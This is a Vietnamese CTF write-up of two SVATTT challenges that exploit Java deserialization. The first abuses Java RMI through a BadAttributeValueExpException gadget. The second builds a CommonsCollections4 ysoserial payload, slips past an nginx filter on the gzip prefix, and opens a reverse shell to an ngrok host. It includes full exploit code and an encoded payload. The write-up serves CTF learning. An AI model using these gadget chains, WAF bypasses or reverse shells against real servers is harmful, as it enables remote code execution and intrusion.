{%hackmd @themes/dracula %} # SVATTT-Quals-2020: ascis_rmi_v1 Trước khi đi vào writeup bài này thì mọi người cần biết về RMI trong Java, mình sẽ nói sơ qua về RMI, và nó có liên quan gì đến Java deser ## RMI là gì ### Khái niệm RMI (Remote Method Invocation) là một API trong java cho phép có thể truy cập method của một object từ xa trên máy khác. Ví dụ mình có 1 server có method `hello` của interface `User`, và phía client có interface `User` nhưng lại không có method `hello`, client muốn gọi method này sẽ đứng từ xa và dùng RMI để truy cập đến method `hello` của server RMI được sử dụng trong các hệ thống phân tán, hoặc gọi đến các method của bên thứ 3. Ví dụ một thư viện `XYZ` cung cấp method `imgRender` để xử lý ảnh, src của thư viện được host ở một nơi khác, ta có thể dùng RMI để truy cập đến method `imgRender` mà không cần tải cả thư viện về. Nói sơ qua về cấu trúc của RMI sẽ như sau:  RMI sẽ bao gồm: - RMI Client : là client gọi đến remote method, tại client có một object trung gian gọi là `Stub`, `Stub` là đại diện của remote Object, và mọi hành động của client đến server đều đi qua `Stub` - RMI Server: là server sẽ tiếp nhận yêu cầu gọi đến method, thực thi method và trả về kết quả, ở server có object gọi là `Skeleton`, tác dụng tương tự `Stub` chỉ là khác tên gọi - RMI Register: hiểu nôm na đây như là một nhà cung cấp, server sẽ bind object lên register, khi client muốn sử dụng nó sẽ lookup trong register luôn ### Code minh họa Interface có ở client và server:  >Note: vì RMI là một concept liên quan đến việc truy cập method từ xa, tức là ở cả server và client đều sẽ có interface có method đó, nhưng phía client thì ko có code implement method của interface (tức là method rỗng), còn ở server thì có. Khi client muốn dùng code implement của server thì sẽ nhờ RMI. Do đó interface phải tồn tại ở cả client và server Remote method trên server:  Hàm main của server:  > Tại hàm main sẽ rebind remote object cho registry, và cung cấp một URI để client truy xuất Code tại client:  > Đơn giản là lookup remote object thông qua URI đã rebind Kết quả Chạy server:  Chạy client:   ### Vậy thì RMI liên quan gì đến Java deser Như đã nói về công dụng của việc seri dữ liệu trong Java, thì để trao đổi các Object qua lại như trong RMI đương nhiên ta sẽ cần đến việc tuần tự hóa dữ liệu, tuy nhiên RMI handle chuyện đó như thế nào. Các bạn có thể tham khảo [blog này](https://su18.org/post/rmi-attack/). Bài blog nói khá chi tiế về cách RMI xử lý dữ liệu cũng như là các dạng tấn công RMI, có nhiều đoạn mình vẫn chưa hiểu vẫn cần debug thêm, trong tương lai mình sẽ có bài phân tích rõ RMI và các cách exploit RMI. Tóm lại thì ta cần biết, trong 3 thành phần của RMI, thành phần nào cũng sẽ đều thực hiện quá trình tuần tự hóa, và nếu ta có thể kiểm soát được object truyền vào, ta hoàn toàn có thể exploit được cả 3 thành phần. Bài `ascis_rmi_v1` ta sẽ exploit Java deser ở thằng RMI Server nên trong quá trình write up mình cũng sẽ giải thích sơ quá cách RMI server deser dữ liệu ## Writeups ascis_rmi_v1 ### Analysis Link src chall : https://drive.google.com/file/d/1Gfwhs0K-sNEQtNtHNK2gZz9IDdrpyOHF/view Chall cho ta 2 file jar là `ascis_player.jar` (client) và `ascis_service1.jar` (server) File `ascis_player.jar` bao gồm:  Src của `ASCISPlayer.java` ```java package rmi; import java.rmi.NotBoundException; import java.rmi.RemoteException; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; public class ASCISPlayer { public ASCISPlayer() { } public static void main(String[] args) throws RemoteException, NotBoundException, NoSuchFieldException, IllegalAccessException { String serverIP = args[0]; int serverPort = Integer.parseInt(args[1]); String name = args[2]; Registry registry = LocateRegistry.getRegistry(serverIP, serverPort); ASCISInterf ascisInterf = (ASCISInterf)registry.lookup("ascis"); System.out.println(ascisInterf.sayHello(name)); } } ``` File `ascis_service1.jar` bao gồm:  Src của `ASCISServer.java` ```java package rmi; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; public class ASCISServer { public ASCISServer() { } public static void main(String[] args) { try { Registry registry = LocateRegistry.createRegistry(1099); registry.rebind("ascis", new ASCISInterfImpl()); System.out.println("ASCIS server is ready"); } catch (Exception var2) { var2.printStackTrace(); } } } ``` Đây là một RMI server đơn giản, tuy nhiên thứ mình chú ý tới là nội dung của `Player.java` và `ASCISInterImpl.java` ASCISInterImpl: ```java package rmi; import java.rmi.RemoteException; import java.rmi.server.UnicastRemoteObject; public class ASCISInterfImpl extends UnicastRemoteObject implements ASCISInterf { public ASCISInterfImpl() throws RemoteException { } public String sayHello(String playerName) throws RemoteException { return String.format("WELCOME %s to ASCIS 2020 !", playerName); } public String login(Object player) throws RemoteException { String msg = ""; Player ascis_player = (Player)player; msg = msg + String.format("\nLOGGED IN ! Welcome %s to ASCIS 2020 !", ascis_player.getName()); msg = msg + "\nHave a nice day! Bye Bye"; return msg; } } ``` Player: ```java public class Player implements Serializable { private String name; private boolean isAdmin; private String logCommand = "echo \"ADMIN LOGGED IN\" > /tmp/log.txt"; public Player() { } public String getName() { return this.name; } public void setName(String name) { this.name = name; } public boolean isAdmin() { return this.isAdmin; } public void setAdmin(boolean admin) { this.isAdmin = admin; } public String toString() { if (this.isAdmin()) { try { Runtime.getRuntime().exec(this.logCommand); } catch (IOException var2) { var2.printStackTrace(); } return "ADMIN LOGGED IN"; } else { return "USER LOGGED IN"; } } } ``` Ta chú ý 2 điều: - Đầu tiên, tại `Player.java` thì nếu `isAdmin` là true thì ta hoàn toàn có thể thực thi cmd thông qua biến `logCommand`, tuy nhiên điều kiện để điều này xảy ra là method `toString` phải được gọi - Thứ 2 method `login` của `ASCISInterImpl.java` nhận vào một object Ta có thể tùy ý set giá trị của `isAdmin` và `logCommand` bằng Reflection API, còn vấn đề làm cách nào gọi được `toString` thì ta sẽ dùng `BadAttributeValueExpException.readObject()` Flow exploit sẽ như sau ``` ASCISInterImpl.login() -> BadAttributeValueExpException.readObject() -> Player().toString -> Runtime.getRuntime().exec(this.logCommand) ``` Chain thì cực kỳ đơn giản, tuy nhiên ta thấy server không hề gọi đến `readObject`, vậy thì làm sao ta trigger được payload ? Debug vào src code của RMI để biết cách RMI xử lý data, ta có cái nhìn tổng quát như sau: Khi client `lookup`, nó sẽ seri tên object và gửi cho Registry  Hàm `lookup` tại `RegistryImp_Stub.class`  Sau đó nó deser dữ liệu trả về từ `Registry`  Kết quả từ `(Remote)var4.readObject()` được gán cho `var22` và return  `var22` cũng chính là giá trị trả về của `registry.lookup` Tiếp thục ta gọi remote method với tham số `name`  Lúc này method `unmarshalValue` tại `UnicastRef.class` sẽ được gọi  `unmarshalValue` sẽ deser `var1`, mà `var1` cũng chính là tham số ta truyền vào remote method ở trên. Tóm lại nếu ta truyền vào một tham số có kdl là object, thì tại RMI Server sẽ thực hiện deser object đó, vậy bây giờ ta chỉ cần tạo gadgetchain và đưa gadgetchain lên server thông qua method `login` ### Exploit Payload: ```java import rmi.ASCISInterf; import rmi.Player; import javax.management.BadAttributeValueExpException; import java.rmi.NotBoundException; import java.rmi.RemoteException; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry; import java.lang.reflect.*; public class ASCISPlayer { public static void main(String[] args) throws RemoteException, NotBoundException, NoSuchFieldException, IllegalAccessException { String serverIP = "127.0.0.1"; // Server IP int serverPort = Integer.parseInt("1099"); // Server Port String name = "endy"; Registry registry = LocateRegistry.getRegistry(serverIP, serverPort); rmi.ASCISInterf ascisInterf = (ASCISInterf)registry.lookup("ascis"); Player pItem = new Player(); BadAttributeValueExpException b = new BadAttributeValueExpException (null); Field isAdmin = Player.class.getDeclaredField("isAdmin"); isAdmin.setAccessible(true); isAdmin.set(pItem,true); Field logCommand = Player.class.getDeclaredField("logCommand"); logCommand.setAccessible(true); logCommand.set(pItem, "calc"); Field val = BadAttributeValueExpException.class.getDeclaredField("val"); val.setAccessible(true); val.set(b, pItem); System.out.println(ascisInterf.login(b)); } } ``` Khi chạy code, `BadAttributeValueExpException.readObject` được gọi, gadgetchain được thực thi, ta popup được calc   # SVATTT-Quals-2022: Waf-deser ## Analysis Src của chall: https://github.com/to016/CTFs/tree/main/SVATTT/2022/Qual/WAF-Deser/src Khi giải nén src thì ta được như sau:  Nội dung của `nginx.conf`  Ta thấy file cấu hình này có 3 chức năng chính như sau - Giới hạn chiều dài URI < 3000 bytes - Nếu URI có chuỗi `H4sI` thì sẽ return 403 - Nếu thỏa các điều kiện trên thì sẽ forward đến `http://web:8080` Mở một project bất kỳ trên IntelliJ và import file jar chall cung cấp ta được các class như sau:  Nhìn lướt qua 3 class thì có vẻ chỉ có `UserController` là cần đáng lưu tâm ```java package vcs.example.wafdeser; import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; import java.io.ObjectInputStream; import java.nio.charset.StandardCharsets; import java.util.Base64; import java.util.zip.GZIPInputStream; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PathVariable; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.bind.annotation.RestController; @RestController public class UserController { public UserController() { } @GetMapping({"/"}) public String sayHello() { return String.format("Hello ASCIS"); } @RequestMapping( value = {"/info/{info}"}, method = {RequestMethod.GET} ) public String getUser(@PathVariable("info") String info, @RequestParam(name = "compress",defaultValue = "false") Boolean isCompress) throws IOException { String unencodedData = this.unEncode(info); String returnData = ""; byte[] data = Base64.getMimeDecoder().decode(unencodedData); if (isCompress) { InputStream is = new ByteArrayInputStream(data); InputStream is = new GZIPInputStream(is); ObjectInputStream ois = new ObjectInputStream(is); try { User user = (User)ois.readObject(); returnData = user.getName(); ois.close(); } catch (Exception var9) { returnData = "?????"; } } else { returnData = new String(data, StandardCharsets.UTF_8); } return String.format("Hello %s", returnData); } private String unEncode(String s) { return s.replaceAll("-", "\\r\\n").replaceAll("%3D", "=").replaceAll("%2B", "\\+").replaceAll("_", "/"); } } ``` Class này cũng chính là Controller của web, nó nhận một chuỗi base64 thông qua path `/info/<base64>` và decode để hiển thị ra dòng chữ `Hello <name>`, ngoài ra nếu URL có param `compress=true`, thì sẽ thực hiện gzip decompress và sau đó deserialize. Như vậy là ta đã tìm được sink của ứng dụng, chỉ cần đưa serialize data ở format gzip và được base64 encode, thì chương trình sẽ thực hiện deserialize. Mở lib của ứng dụng để tìm thư viện có thể lợi dụng để làm gadgetchain, ta thấy lib có `CommonsCollections4`  Vậy thì bây giờ chỉ cần gen payload và bem thôi ## Exploit Mình sẽ include `ysoserial` và dùng `getObject` để gen payload cho tiện ```java package main; import ysoserial.payloads.*; import ysoserial.payloads.util.CmdExecuteHelper; import java.io.*; import java.util.Base64; import java.util.zip.GZIPOutputStream; public class Main { public static void main(String args[]) throws Exception { CmdExecuteHelper cmd = new CmdExecuteHelper("cmd", "calc.exe"); Object payload = new CommonsCollections4().getObject(cmd); ByteArrayOutputStream baos = new ByteArrayOutputStream(); GZIPOutputStream gzipOut = new GZIPOutputStream(baos); ObjectOutputStream objectOut = new ObjectOutputStream(gzipOut); objectOut.writeObject(payload); objectOut.close(); byte[] dat = baos.toByteArray(); String a = Base64.getMimeEncoder().encodeToString(dat); System.out.println(a); } } ``` Kết quả:  Mà hình như có gì đó sai sai, đoạn nginx config ở đầu đã block `H4sI`, nhưng `H4sI` lại là magic bytes của gzip khi encode base64. Bây giờ mình phải tìm cách để bypass. Để bypass cũng khá đơn giản, mình đã từng có bài viết về hành vì decode base64 của PHP [link](https://hackmd.io/9BIfLHZESZKsyTs_ef_YWw?view#:~:text=Euro%20symbol%20%2BIKw.-,B.%20S%E1%BB%B1%20k%E1%BB%B3%20di%E1%BB%87u%20c%E1%BB%A7a%20h%C3%A0m%20x%E1%BB%AD%20l%C3%BD%20base64%20trong%20PHP,-Tr%C6%B0%E1%BB%9Bc%20khi%20%C4%91i), cụ thể thì nếu trong chuỗi base64 có ký tự rác, khi decode PHP sẽ tự động loại bỏ các ký tự đó ```php $ php -r "echo base64_encode('endyne');" ZW5keW5l $ php -r "echo base64_decode('ZW5keW5l');" endyne $ php -r "echo base64_decode('@@_ZW5keW5l');" endyne ``` Mình tự hỏi là trong Java thì hành vi có tương tự không ? Và câu trả lời là có, mình test bằng đoạn code sau: ```java import java.util.Base64.Decoder; public class Test { public static void main(String[] args) { String stringA = "ZW5keQ=="; Decoder mimeDecoder = Base64.getMimeDecoder(); byte[] decodedBytes = mimeDecoder.decode(stringA); String decodedString = new String(decodedBytes); System.out.println("Base64 code: " + stringA); System.out.println("Decoded string: " + decodedString); String stringB = "ZW5@@keQ=="; Decoder mimeDecoder2 = Base64.getMimeDecoder(); byte[] decodedBytes2 = mimeDecoder.decode(stringA); String decodedString2 = new String(decodedBytes); System.out.println("Base64 code: " + stringB); System.out.println("Decoded string: " + decodedString); } } ``` Kết quả:  Ta thấy dù có thêm `@@` vào giữa chuỗi base64 thì vẫn decode ra cùng 1 kết quả, vậy chỉ cần thêm `@@` vào giữa chuỗi `H4sI` là easy bypass Tuy nhiên ta còn một của ải cuối cùng là hàm ```java private String unEncode(String s) { return s.replaceAll("-", "\\r\\n").replaceAll("%3D", "=").replaceAll("%2B", "\\+").replaceAll("_", "/"); } ``` Hàm này thì khá đơn giản. Ta chỉ cần thay các ký tự `/` trong payload thành `-` và lợi dụng `replaceAll("_", "/")` để đưa payload về đúng dạng. Code gen payload cuối cùng để reverse shell ```java package main; import ysoserial.payloads.*; import ysoserial.payloads.util.CmdExecuteHelper; import java.io.*; import java.util.Base64; import java.util.zip.GZIPOutputStream; public class Main { public static void main(String args[]) throws Exception { CmdExecuteHelper cmd = new CmdExecuteHelper("bash", "bash -c 'bash -i >& /dev/tcp/0.tcp.ap.ngrok.io/13153 0>&1'"); Object payload = new CommonsCollections4().getObject(cmd); ByteArrayOutputStream baos = new ByteArrayOutputStream(); GZIPOutputStream gzipOut = new GZIPOutputStream(baos); ObjectOutputStream objectOut = new ObjectOutputStream(gzipOut); objectOut.writeObject(payload); objectOut.close(); byte[] dat = baos.toByteArray(); String a = Base64.getMimeEncoder().encodeToString(dat); a = a.replaceAll("/","_"); System.out.println(a); } } ``` Payload sẽ là ``` H4sIAAAAAAAAAK1WS2wbVRS9z44_cRzaOL9+CHEpbZ2WzDh1_k6TJi0tBpcGbPrBi2g8fnWmHc+480mdLkBFqCy6KaKo6goWBRYNSJEQVEggsULiJxZISEVIFQtW_KRWAlTxuW9m_GkTGqfUkmfe3Hfvfefde+59b+Fn8OgadB4X5gTONCSZm9YkVZOM+adNatIL16Lv3Zp4cdENrgQ06NJpmoSAqBaKgiYYqmZAR5JZ8syS31ORx0tFAHCh4ylVy3NCURBnKYd2BVXR8S3LVDQkHPdzVWc6l9YERT+magVJyVed8X++9NuORf8XLnAloTFHRRXFNHcSngeShCajbEQRTm8S1+Pt9XhnPb52PT5dVUeUiHD3ahA6qLIyreK7dfPSlqvK4pALwHIYX8nhMVMRbW+zgqTQXA2k6KcXf4qcvtjgApKBZqlmRjeAy6xyd6bm2NwVTq3NyJnRW_5rE29ae3FSOFb_fvDTEBSjxuORufMtk67FCy6Wq0aprGFAyCaOLCh5_mD2ODpDwHMaDOESnG4qXM2qJQHVOEkxqKYIMlfSZUPkMO8lxD55ZJ8k4wRUf1YWJupGnbAhSUiqGuD9526+cPns13FkXQY80qSWxwy0ZpaizkCTNI1MKKTnixR1QrU6e2RB1+1MOLYck3OO7fmvjry+Vu+Ry+EmCHx0dQGghaKMyPUEvhsPH_xEWbgSc4M3Ac0zkpKjivGUWchSLQEPzFiVIlMjgfJSBgIz2XkDqynHULszmakMeGdEBpiVVlsSPDOKUKC3pyplaFic8SS0zKimUTSNaU0tYuVJzEltM6jK7WYA_+APw8AWevKv9e35_HdDFZah3JWZWrjR+YfXn77uiH3Nn_394cc4HYOJALjhYR_s8sEWH2wlsFanmiTIh7AuMJvPJvYSIE8QaC7z65Agm9TzTvjVG698_+s4Ae+YpEgGDtyRnkMEGvbgrgmsSWL52fFJs5omuFVVRLcCOsdvR9hgzEo6gdaUYWbTTgynhXlZFXIEgglFoZqVZ4pKA8l5XbXB8UVbR7cDsl_I5amhP7KMlziBxkobI6BFksgBHjnA19S7xQG+zAHe4gC_9+CBeGZZ7YJc1bXxYPPW+JQzFFgVPC4oORmrnoXEn1NFs4B8IdhEV7M8ms7afnD7U_8fDIHAYyWRFq0y9cE2Am+tLh4rIsgZBX5v+sBkSdITKLIOrPsTQ8lxx3hwLygI+JxYEpi8H5FMqaYmUuyQSOOgw0COFWkQAtDkgwiB2D0QlsDuejOimdhaC5SfzOpIcdEoeyLQZjULSa2Ct6ptpF7PZU8VthDoXmEvmKIxUXZaQUu1qz1jg_TBdowZKjrfBNojPcklavEgPAq9AdgBHHaiO3ujD6JYznxWUvisoM_6YScBV6_oh34Co0wS7hXD2+yBFB7fGuZzdI43xCIf5fCJLZ9T8pp6gsPI9MX6BmLh6PjWvm1+GMROREtUJBCJZJa25Fqg2HxFigdPEIZhhAEdxd6YMgTxxAGh6HS1rmqspk9hC+sfHto5GBuOjQwPDkZxC93JuyrEYRO4sCsjKPxvAA948e1j3Rz8lgwJhs8gSnh8E3x7tn8AZNFSacan1xJG4QF8Bm0FWAPj7ByEVmhDLWY8gX83k91pOGAZhu1Jx5CN2qHDmifQCevQYj2ObYzM7UbHbcKSLuN2xHK73Z5c1u2D0IUWbPQQdOPy1QX80FPZ9AD6Y1rht8FNkleB934EfUfdoVjqaENoIHXUExpKvQ_xw4uWpzFrlwTv2bgjBmgTtOA7gFMu2AxrodFkp3I36n5TORY3smOx3QedPljng_X1Hosnf5R+GSvsX3d_jkX3PlVdcgxuWfEYRKt6GtQGApvrcHVbHdqXq_9sMCs1ibsSm9RP7F13EDtkzbdaz7aa7Haw7BYNaMAq04qnCJTwOhSqvS3at8grHd+++_mXz12qXBbxttzFlEocHgtc5QJRvRPedic+xQjtxgtmS9VxAjtqnmqhH964_PuZl4fxkp4AzxwjSUmzI2rr2WQ4u_BaV9OF6+cqABgje0r_Ak77J2BDDgAA ``` Đừng quên thêm `@@` vào giữa `H4sI`  Kết quả:  # Refer https://www.javatpoint.com/RMI https://su18.org/post/rmi-attack/ https://drive.google.com/file/d/1Gfwhs0K-sNEQtNtHNK2gZz9IDdrpyOHF/view https://github.com/tsug0d/LearnJavaVulnerability https://github.com/vinhjaxt/CTF-writeups/issues/2 https://nhienit.wordpress.com/2022/10/20/waf-deser-ascis-2022-quals/ https://nguyendt.hashnode.dev/ascis-2022-qual-writeup-web-challenges#heading-waf-deser